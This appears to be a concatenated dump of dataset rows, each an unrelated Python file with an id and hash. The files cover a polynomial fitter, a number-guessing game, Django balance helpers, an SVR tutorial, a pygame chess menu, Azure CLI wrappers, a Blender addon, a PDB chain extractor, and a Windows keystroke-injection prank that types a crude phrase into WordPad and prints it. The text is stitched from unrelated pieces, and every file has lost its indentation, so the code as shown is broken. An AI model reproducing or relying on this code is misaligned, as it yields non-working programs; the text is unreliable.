print('Now creating the following directory structure:')
print('-'*80)
print_dirs(projdir_struct, 0, 2)
print('-'*80)
create_dirs(projdir_struct)
print('-'*80)
class InitProj(luigi.Task):
projname = luigi.Parameter()
def output(self):
return luigi.LocalTarget(self.projname)
def run(self):
shutil.copytree(get_file_dir() + '/../.projtpl', self.projname)
if __name__ == '__main__':
luigi.run()
#print get_file_dir()
|
996,887 | 436d6b72eb2b0623fe5d9eb5cbd83a97e438a3ad | import math
import numpy as np
import matplotlib.pyplot as plt
def graph(formula, first, last):
x = np.linspace(first,last,100)
y = eval(formula)
plt.plot(x, y)
plt.show()
common = 0
degree = 0
data = []
numofnums = input("How many numbers are there? ")
for x in range(numofnums):
num = input("Enter the "+str((x+1))+" number: ")
data.append(num)
print data
difs = [data]
for x in range(numofnums-1):
difs.append([])
for x in range(numofnums-1):
for y in range(numofnums-1-x):
difs[x+1].append(difs[x][y+1]-difs[x][y])
print difs
for x in range(numofnums):
a = difs[x][0]
same = 0
for y in range(numofnums-x):
if difs[x][y] != a:
same = 1
if same == 0:
degree = x
break
print "The degree is "+str(degree)
degstuff = []
for x in range(degree+1):
degstuff.append([])
for x in range(degree+1):
for y in range(degree+1-x):
degstuff[x].append([])
for z in range(degree+1-x):
degstuff[x][y].append([])
for x in range(degree+1):
for y in range(degree+1):
degstuff[0][degree-x][y] = (y+1)**(x)
for x in range(degree):
for y in range(degree-x):
for z in range(degree-x):
degstuff[x+1][y][z] = degstuff[x][y][z+1]-degstuff[x][y][z]
#print degstuff
coefficients = []
for x in range(degree+1):
modco = []
if x != 0:
for y in range(x):
modco.append(coefficients[y])
for y in range(x):
modco[y] = modco[y]*(degstuff[degree-x][y][0])
modsum = sum(modco)
else:
modsum = 0
coefficients.append(((difs[degree-x][0])-modsum)/(degstuff[degree-x][x][0]))
#print coefficients[x]
print coefficients
expression = "0"
for x in range(len(coefficients)):
expression = expression+"+"+str(coefficients[x])+"*x**"+str(len(coefficients)-x-1)
print expression
graph(expression, 0, numofnums+1)
|
996,888 | d29de7d1b69180ec93bfb1e67a02f3a91f753ebe | #!/usr/bin/python3
"""number_guess.py, an implementation of the number guess task"""
__author__ = "Steve McGuire"
__contact__ = "s.mcguire@hud.ac.uk"
import random
secret_number = random.randint(0, 101)
print(secret_number)
counter = 1
while True:
try:
response = int(input("Please guess a number"))
# print(type(response))
# print(response)
if response not in range(0, 101):
print("Out of range")
else:
if response == secret_number:
print("Well done")
print("You took {} guesses".format(counter))
break
elif response > secret_number:
print("Your guess is too high")
else:
print("Your guess is too low")
counter += 1
except ValueError:
print("Please enter a number between zero and 100")
print(counter)
|
996,889 | b2d378bdcae8d24e60401dd27093d96219dc6e8f | # Jesse Nayak
# jdn4ae
# 2/22/15
# helper.py
def greeting(msg):
print(msg) |
996,890 | fe3b209f3f56de522c51dc7dbeab03f834ee370d | from models import Balances, Member, Charity, Team, TeamMemberList, Invite
from django.core.exceptions import ObjectDoesNotExist
#Gets every balance associated with the user
def getAllBalance(user):
member = Member.objects.get(user=user) #get member from current user
balances = None
try:
balances = Balances.objects.all().filter(member=member, team=None)
except ObjectDoesNotExist:
pass
return balances
#Gets the balances of a user for specific team
def getTeamBalance(user):
member = Member.objects.get(user=user) #get member from current user
teamMemberList = member.teammemberlist_set.all()
balances = []
if not teamMemberList == None:
for teamList in teamMemberList:
team = teamList.team
try:
balance = Balances.objects.get(member=member, team=team)
balances.append(balance)
except ObjectDoesNotExist:
pass
return balances
#Updates the balance for a user by charity according to the entered value
def addToBalance(member, charityname, increment):
success = False
if increment >= 0:
try:
b = Balances.objects.get(member=member, charity=charityname, team=None)
b.balance += increment
b.save()
except ObjectDoesNotExist:
b = Balances.objects.create(member=member, charity=charityname, team=None,balance=increment)
success = True
return success
#Updates the balance for a user by team according to the entered value
def addToTeamBalance(member, team, increment):
success = False
if increment >= 0:
try:
b = Balances.objects.get(member=member, team=team, charity=team.charity)
b.balance += increment
b.save()
except ObjectDoesNotExist:
b = Balances.objects.create(member=member, team=team, charity=team.charity, balance=increment)
success = True
return success
|
996,891 | 527a91169240bb5d7ba72a2dc4a4b0458f020a84 | # this is a 1 line comment
"""This is
a multiple line
comment"""
print("Hello World")
name = "John Doe"
_age = "20 years old"
grade = 100
# _age = 30
location = "I'm from Philippines"
location2 = 'I\'m from Japan'
message = "My name is " + name
add = 100 + 200
print(add)
print(message)
print(name)
print(_age)
print(grade)
number = 50 + 50.5
print(number)
name = "John"
age = 20
num = "50"
convert = float(num)
msg = "My name is " + name + " I'm " + str(age) + " years old"
print(msg)
print(convert + 100) |
996,892 | aa708eb91cdda73c6c19d3bc2da8be172620cc5c | # Author: Charse
'''支持向量机(回归)
'''
import numpy
from sklearn.datasets import load_boston
from sklearn.model_selection import train_test_split
from sklearn.svm import SVR
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import mean_squared_error, mean_absolute_error
# 从读取房价数据村粗在变量中
boston = load_boston()
print("boston.DESCR:", boston)
X = boston.data
y = boston.target
print("boston.data:", X)
print("boston.target:", y)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=33, test_size=0.25)
# 分析回归目标值的差异
print("The max target value is", numpy.max(boston.target))
print("The min target value is", numpy.min(boston.target))
print("The average target value is", numpy.mean(boston.target))
# 分别初始化对特征和目标值的标准化器。
ss_X = StandardScaler()
ss_y = StandardScaler()
# 分别对训练和测试数据的特征以及目标值进行标准化处理。
X_train = ss_X.fit_transform(X_train)
X_test = ss_X.transform(X_test)
y_train = ss_y.fit_transform(y_train)
y_test = ss_y.transform(y_test)
# 使用线性核函数配置的支持向量进行回归训练,并且对测试样本进行预测
linear_svr = SVR(kernel='linear')
linear_svr.fit(X_train, y_train)
linear_svr_y_predict = linear_svr.predict(X_test)
# 使用多项式核函数配置的支持向量机进行回归训练,并且对测试样本进行预测
poly_svr = SVR(kernel='poly')
poly_svr.fit(X_train, y_train)
poly_svr_y_predict = poly_svr.predict(X_test)
# 使用径向基核函数配置的支持向量机进行回归训练,并且对测试样本进行预测
rbf_svr = SVR(kernel='rbf')
rbf_svr.fit(X_train, y_train)
rbf_svr_y_predict = rbf_svr.predict(X_test)
# 线性核函数
print("R-squared value of linear SVR is", linear_svr.score(X_test, y_test))
print("The mean squared error of linear SVR is",
mean_squared_error(ss_y.inverse_transform(y_test), ss_y.inverse_transform(linear_svr_y_predict)))
print("The mean absolute error of linear SVR is",
mean_absolute_error(ss_y.inverse_transform(y_test), ss_y.inverse_transform(linear_svr_y_predict)))
# 多项式核函数
print("R-squared value of linear Poly SVR is", poly_svr.score(X_test, y_test))
print("The mean squared error of Poly SVR is",
mean_squared_error(ss_y.inverse_transform(y_test), ss_y.inverse_transform(poly_svr_y_predict)))
print("The mean absolute error of Poly SVR is",
mean_absolute_error(ss_y.inverse_transform(y_test), ss_y.inverse_transform(poly_svr_y_predict)))
# 径向基核函数
print("R-squared value of linear rbf SVR is", rbf_svr.score(X_test, y_test))
print("The mean squared error of rbf SVR is",
mean_squared_error(ss_y.inverse_transform(y_test), ss_y.inverse_transform(rbf_svr_y_predict)))
print("The mean absolute error of rbf SVR is",
mean_absolute_error(ss_y.inverse_transform(y_test), ss_y.inverse_transform(rbf_svr_y_predict)))
## 性能测评
'''
使用径向基(Radial basis function)核函数对特征进行非线性映射之后,支持向量机展现了最佳的回归性能
这个例子展示了不同配置模型在相同数据上所表现的性能差异,该模型还可以通过配置不同的核函数来改变模型性能,因此
建议读者在使用时多尝试几种配置进而获得更好的预测性能
核函数时一项非常有用的特征技巧,同时在数学描述上也略为复杂,因此在本书中不做过度引申
简单一些理解,便是通过某种函数计算,将原有的特征映射到更高维度空间,从而尽可能达到新的高纬度特征线性可分的程度
结合支持向量机的特点,这种高纬度线性可分的数据特征恰好可以发挥其模型的优势
'''
|
996,893 | 3de5ab8587f884634a8d19943c28a3fcbe450a65 | import pygame
from chess.constants import WIDTH, HEIGHT, CELL_SIZE, BLACK, button_font, RED, GREEN
from chess.board import Board
import sys
pygame.init()
FPS = 60
WIN = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption("Chess")
clock = pygame.time.Clock()
clock.tick(FPS)
events = None
def text_objects(text, font, colour, pos):
global WIN
text_surface = font.render(text, True, colour)
text_rect = text_surface.get_rect()
text_rect.center = pos
WIN.blit(text_surface, text_rect)
def button(text, x, y, w, h, colour, active_colour, action=None):
global events
mouse = pygame.mouse.get_pos()
if x + w > mouse[0] > x and y + h > mouse[1] > y:
pygame.draw.rect(WIN, active_colour, (x-4, y-4, w+10, h+10))
for event in events:
if event.type == pygame.MOUSEBUTTONUP and action is not None:
action()
else:
pygame.draw.rect(WIN, colour, (x, y, w, h))
text_objects(text, button_font, BLACK, ((x + (w // 2)), (y + (h // 2))))
def quit_game():
pygame.quit()
sys.exit()
def main():
global WIN, done, events
running = True
done = None
board = Board()
while running:
events = pygame.event.get()
for event in events:
if event.type == pygame.QUIT:
running = False
quit_game()
if event.type == pygame.MOUSEBUTTONUP:
pos = pygame.mouse.get_pos()
if pos[1] <= HEIGHT - 58:
col = pos[0] // CELL_SIZE
row = pos[1] // CELL_SIZE
board.select(row, col)
if done is None:
done = board.draw(WIN)
elif done == 'cm' or done == 'sm':
running = False
menu()
pygame.draw.rect(WIN, BLACK, (0, HEIGHT-58, WIDTH, 58))
button("Play again", WIDTH-120, HEIGHT-54, 100, 50, GREEN, RED, action=main)
pygame.display.update()
def menu():
global WIN, events
running = True
done = None
while running:
events = pygame.event.get()
for event in events:
if event.type == pygame.QUIT:
running = False
quit_game()
WIN.fill(BLACK)
button("Start", (WIDTH//2)-50, (HEIGHT//2)-60, 100, 50, RED, GREEN, action=main)
button("Exit", (WIDTH//2)-50, (HEIGHT//2)+60, 100, 50, GREEN, RED, action=quit_game)
pygame.display.update()
menu()
|
996,894 | 9940e52581635e4f85e53b25ea91e382f387e7de | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
def dns_resolver_list(cmd,
resource_group_name=None,
virtual_network_name=None,
top=None):
from azext_dnsresolver.aaz.latest.dns_resolver import ListByVirtualNetwork, List
List_By_Virtual_Network = ListByVirtualNetwork(cmd.loader)
List_dns_resolver = List(cmd.loader)
if resource_group_name and virtual_network_name is not None:
args = {
"resource_group": resource_group_name,
"virtual_network_name": virtual_network_name,
"top": top
}
return List_By_Virtual_Network(args)
elif resource_group_name:
args = {
"resource_group": resource_group_name,
"top": top
}
return List_dns_resolver(args)
args = {
"top": top
}
return List_dns_resolver(args)
def dns_resolver_forwarding_ruleset_list(cmd,
resource_group_name=None,
virtual_network_name=None,
top=None):
from azext_dnsresolver.aaz.latest.dns_resolver.forwarding_ruleset import ListByVirtualNetwork, List
List_By_Virtual_Network = ListByVirtualNetwork(cmd.loader)
List_dns_resolver = List(cmd.loader)
if resource_group_name and virtual_network_name is not None:
args = {
"resource_group": resource_group_name,
"virtual_network_name": virtual_network_name,
"top": top
}
return List_By_Virtual_Network(args)
elif resource_group_name:
args = {
"resource_group": resource_group_name,
"top": top
}
return List_dns_resolver(args)
args = {
"top": top
}
return List_dns_resolver(args)
|
996,895 | 00b45fa4b6d754bbea965ca74279bdd935c661ac | #8.14
def game_info(tytuł, gatunek, **cechy):
"""Pokazuje informacje o grze."""
gra = {}
gra['Tytuł'] = tytuł
gra['Gatunek'] = gatunek
for k, v in cechy.items():
gra[k] = v
return gra
gra = game_info('LoL', 'MOBA', Wydawca='Riot Games')
print(gra)
|
996,896 | 9cf98933a0f86babe4a6647f1298b11114f55019 | ###############################################################################
# #
# Dense.py #
# J. Steiner #
# #
###############################################################################
#%%########################### LOAD DEPENDENCIES ##############################
# imports the ability to work
import numpy as np
#%%######################### DENSE LAYER DEFINITION ###########################
class Dense():
# class constructor
def __init__(self, inputDims, outputDims):
#######################################################################
# Param: inputDims - the dimensionality of our input into the dense
# layer
# outputDims - the dimensionality of our output into the dense
# layer
# initializes our weights from a random normal distribution with a mean
# of 0 and a standard deviation of 1/sqrt(outputDims)
self.weights = np.random.normal(scale = np.power(outputDims, -0.5),
size = (outputDims, inputDims))
# initializes our bias vectors as a 0 vector
self.bias = np.zeros((outputDims, 1))
# initializes and zeros out our model gradients
self.zeroGrad()
# zeros out our model gradients
def zeroGrad(self):
# zeros out model gradients
self.dL_dWeights = np.zeros_like(self.weights)
self.dL_dBias = np.zeros_like(self.bias)
# runs a forward pass through our model gradient
def forward(self, x):
# stores the input into the model for backpropagtion
self.x = x
# calculates the dense output
output = np.matmul(self.weights, x) + self.bias
# returns the pre-activation function dense output
return output
# backwards pass through the dense layer
def backward(self, dL_dDense):
#######################################################################
# Param: dL_dDense - the gradient of loss with respect to the dense
# layer with the chain rule (activation function
# prime(denseOutput) * dL_dDense) already performed
# calculates the gradient of loss with respect to the model output
self.dL_dWeights += np.matmul(dL_dDense, self.x.T)
# calculates the gradient of the bias with respect to the model output
self.dL_dBias += np.sum(dL_dDense, axis = 1, keepdims = True)
# calculates the gradient of loss with respect to the input into the
# dense layer
dL_dX = np.matmul(self.weights.T, dL_dDense)
# returns the gradient of loss with respect to the input into the dense
# layer
return dL_dX
# steps model parameters
def step(self, learningRate, batchSize):
# calculates the factor we scale down the input by
scaleFactor = learningRate / batchSize
# steps model parameters after scaling them down
self.weights -= scaleFactor * self.dL_dWeights
self.bias -= scaleFactor * self.dL_dBias
|
996,897 | 4747c7f5f3f776e3e8067d685efd973ad3285e7d | import ctypes
from ctypes import wintypes
import time
user32 = ctypes.WinDLL('user32', use_last_error=True)
INPUT_MOUSE = 0
INPUT_KEYBOARD = 1
INPUT_HARDWARE = 2
KEYEVENTF_EXTENDEDKEY = 0x0001
KEYEVENTF_KEYUP = 0x0002
KEYEVENTF_UNICODE = 0x0004
KEYEVENTF_SCANCODE = 0x0008
MAPVK_VK_TO_VSC = 0
# msdn.microsoft.com/en-us/library/dd375731
VK_TAB = 0x09
VK_MENU = 0x12
windowskey = 0x5B
# C struct definitions
wintypes.ULONG_PTR = wintypes.WPARAM
class MOUSEINPUT(ctypes.Structure):
_fields_ = (("dx", wintypes.LONG),
("dy", wintypes.LONG),
("mouseData", wintypes.DWORD),
("dwFlags", wintypes.DWORD),
("time", wintypes.DWORD),
("dwExtraInfo", wintypes.ULONG_PTR))
class KEYBDINPUT(ctypes.Structure):
_fields_ = (("wVk", wintypes.WORD),
("wScan", wintypes.WORD),
("dwFlags", wintypes.DWORD),
("time", wintypes.DWORD),
("dwExtraInfo", wintypes.ULONG_PTR))
def __init__(self, *args, **kwds):
super(KEYBDINPUT, self).__init__(*args, **kwds)
# some programs use the scan code even if KEYEVENTF_SCANCODE
# isn't set in dwFflags, so attempt to map the correct code.
if not self.dwFlags & KEYEVENTF_UNICODE:
self.wScan = user32.MapVirtualKeyExW(self.wVk,
MAPVK_VK_TO_VSC, 0)
class HARDWAREINPUT(ctypes.Structure):
_fields_ = (("uMsg", wintypes.DWORD),
("wParamL", wintypes.WORD),
("wParamH", wintypes.WORD))
class INPUT(ctypes.Structure):
class _INPUT(ctypes.Union):
_fields_ = (("ki", KEYBDINPUT),
("mi", MOUSEINPUT),
("hi", HARDWAREINPUT))
_anonymous_ = ("_input",)
_fields_ = (("type", wintypes.DWORD),
("_input", _INPUT))
LPINPUT = ctypes.POINTER(INPUT)
def _check_count(result, func, args):
if result == 0:
raise ctypes.WinError(ctypes.get_last_error())
return args
user32.SendInput.errcheck = _check_count
user32.SendInput.argtypes = (wintypes.UINT, # nInputs
LPINPUT, # pInputs
ctypes.c_int) # cbSize
# Functions
def PressKey(hexKeyCode):
x = INPUT(type=INPUT_KEYBOARD,
ki=KEYBDINPUT(wVk=hexKeyCode))
user32.SendInput(1, ctypes.byref(x), ctypes.sizeof(x))
def ReleaseKey(hexKeyCode):
x = INPUT(type=INPUT_KEYBOARD,
ki=KEYBDINPUT(wVk=hexKeyCode,
dwFlags=KEYEVENTF_KEYUP))
user32.SendInput(1, ctypes.byref(x), ctypes.sizeof(x))
def AltTab():
"""Press Alt+Tab and hold Alt key for 2 seconds
in order to see the overlay.
"""
PressKey(VK_MENU) # Alt
PressKey(VK_TAB) # Tab
ReleaseKey(VK_TAB) # Tab~
time.sleep(2)
ReleaseKey(VK_MENU) # Alt~
def cum():
Spacebar = 0x20
WKey = 0x57
OKey = 0x4f
RKey = 0x52
DKey = 0x44
PKey = 0x50
AKey = 0x41
Enter = 0x0D
GreaterThan = 0xBE
CKey = 0x43
UKey = 0x55
MKey = 0x4D
IKey = 0x49
SKey = 0x53
NKey = 0x4E
Control = 0x11
Shift = 0x10
PressKey(windowskey)
ReleaseKey(windowskey)
time.sleep(1)
PressKey(WKey)
ReleaseKey(WKey)
PressKey(OKey)
ReleaseKey(OKey)
PressKey(RKey)
ReleaseKey(RKey)
PressKey(DKey)
ReleaseKey(DKey)
PressKey(PKey)
ReleaseKey(PKey)
PressKey(AKey)
ReleaseKey(AKey)
PressKey(DKey)
ReleaseKey(DKey)
time.sleep(1)
PressKey(Enter)
ReleaseKey(Enter)
time.sleep(3)
for _i in range(12):
PressKey(Control)
PressKey(Shift)
PressKey(GreaterThan)
ReleaseKey(Control)
ReleaseKey(Shift)
ReleaseKey(GreaterThan)
PressKey(CKey)
ReleaseKey(CKey)
PressKey(UKey)
ReleaseKey(UKey)
PressKey(MKey)
ReleaseKey(MKey)
PressKey(Spacebar)
ReleaseKey(Spacebar)
PressKey(SKey)
ReleaseKey(SKey)
PressKey(AKey)
ReleaseKey(AKey)
PressKey(NKey)
ReleaseKey(NKey)
PressKey(SKey)
ReleaseKey(SKey)
time.sleep(2)
PressKey(Control)
PressKey(PKey)
ReleaseKey(Control)
ReleaseKey(PKey)
time.sleep(1)
PressKey(VK_MENU)
PressKey(PKey)
ReleaseKey(VK_MENU)
ReleaseKey(PKey)
if __name__ == "__main__":
cum()
|
996,898 | 42c3c5b61ab1bdf9dfb0a2747ed3530b2ce49a66 | #
# Copyright (c) 2015 Conrad Dueck
#
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER
# OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# made in response to --
# Andy Carney request for an easy toggle for all scene wireframe modifiers
#
bl_info = {
"name": "WireFrame Modifier Tool",
"author": "conrad dueck",
"version": (0,1,1),
"blender": (2, 73, 0),
"location": "View3D > Tool Shelf > Addons",
"description": "Turn OFF or ON all wireframe modifiers in the scene.",
"warning": "",
"wiki_url": "",
"tracker_url": "",
"category": "3D View"}
import bpy
#define button operators
class BUTTON_OT_wfmodon(bpy.types.Operator):
'''Turn all scene wireframe modifiers ON.'''
bl_idname = "wfmod.on"
bl_label = "ON"
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
if bpy.context.scene.wfmodsel:
theobjs = bpy.context.selected_objects
else:
theobjs = bpy.context.scene.objects
for a in theobjs:
b = a.modifiers
for c in b:
if c.type == 'WIREFRAME':
c.show_render = 1
c.show_viewport = 1
return{'FINISHED'}
class BUTTON_OT_wfmodoff(bpy.types.Operator):
'''Turn all scene wireframe modifiers OFF.'''
bl_idname = "wfmod.off"
bl_label = "OFF"
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
if bpy.context.scene.wfmodsel:
theobjs = bpy.context.selected_objects
else:
theobjs = bpy.context.scene.objects
for a in theobjs:
b = a.modifiers
for c in b:
if c.type == 'WIREFRAME':
c.show_render = 0
c.show_viewport = 0
return{'FINISHED'}
class BUTTON_OT_wfmodreplace(bpy.types.Operator):
'''Toggle Replace Original checkbox.'''
bl_idname = "wfmod.replace"
bl_label = "Replace Toggle"
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
if bpy.context.scene.wfmodsel:
theobjs = bpy.context.selected_objects
else:
theobjs = bpy.context.scene.objects
for a in theobjs:
b = a.modifiers
for c in b:
if c.type == 'WIREFRAME':
if c.use_replace == 0:
c.use_replace = 1
else:
c.use_replace = 0
return{'FINISHED'}
class BUTTON_OT_wfmoddelete(bpy.types.Operator):
'''Delete wireframe modifiers'''
bl_idname = "wfmod.delete"
bl_label = "Delete"
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
if bpy.context.scene.wfmodsel:
theobjs = bpy.context.selected_objects
else:
theobjs = bpy.context.scene.objects
for a in theobjs:
b = a.modifiers
for c in b:
if c.type == 'WIREFRAME':
a.modifiers.remove(c)
return{'FINISHED'}
#define panel
class VIEW3D_OT_wfmodtool(bpy.types.Panel):
bl_space_type = 'VIEW_3D'
bl_region_type = 'TOOLS'
bl_label = "Wireframe Tool"
bl_context = "objectmode"
bl_category = 'Addons'
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
layout = self.layout
layout.prop(context.scene, "wfmodsel")
layout.operator("wfmod.on", text=(BUTTON_OT_wfmodon.bl_label))
layout.operator("wfmod.off", text=(BUTTON_OT_wfmodoff.bl_label))
layout.operator("wfmod.replace", text=(BUTTON_OT_wfmodreplace.bl_label))
layout.operator("wfmod.delete", text=(BUTTON_OT_wfmoddelete.bl_label))
row = layout.row()
#register
def register():
bpy.utils.register_module(__name__)
bpy.types.Scene.wfmodsel = bpy.props.BoolProperty \
(
name = "Only Selected",
description = "Only act on selected objects",
default = False
)
def unregister():
bpy.utils.unregister_module(__name__)
del bpy.types.Scene.wfmodsel
if __name__ == "__main__":
register()
|
996,899 | a085bb994bc0eaafe69f307ce5a78d0cb2bd1bae | #!/usr/bin/env python
import sys
import string
#takes a list of pdbs with characters of the chains you want to keep
# example 1uad.pdb A,C
if __name__ == '__main__':
pdbchainlist = open(sys.argv[1])
for eachline in pdbchainlist:
if len(eachline) < 2:
print "Line is empty. Moving on..."
continue
splitline = eachline.split()
# make the file name
filename = splitline[0]
output_filename= filename[:-4] + "_chain_"
inputpdb = open( filename , "r" )
pdb_str = inputpdb.read()
commachains = splitline[1]
eachchain=commachains.split(',')
keptlines = []
#itterate through chains you want to keep
for chain in eachchain:
#itterate through the pdb
for l in pdb_str.split("\n"):
if l[21:22] == chain:
#keep any MSE lines
if l[:6] == "HETATM" and l[17:20] == "MSE":
#fixes missing occupancy
line = l[:56]+"1.00"+l[60:]
keptlines.append(line)
#other residues
elif l[:4] == "ATOM" or l[:3] == "TER":
#fixes missing occupancy
line = l[:56]+"1.00"+l[60:]
keptlines.append(line)
#finish itterating and building
#name output file
for substr in eachchain:
output_filename = output_filename + substr
output_filename = output_filename + ".pdb"
print "Writing file: ",output_filename
#now open and write to said file
newpdb = open( output_filename , "w" )
#write the mutation(s) to the file
for line in keptlines:
newpdb.write(line + "\n")
#close the file when done
newpdb.close()
#completed each line
continue
print "Completed!"
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.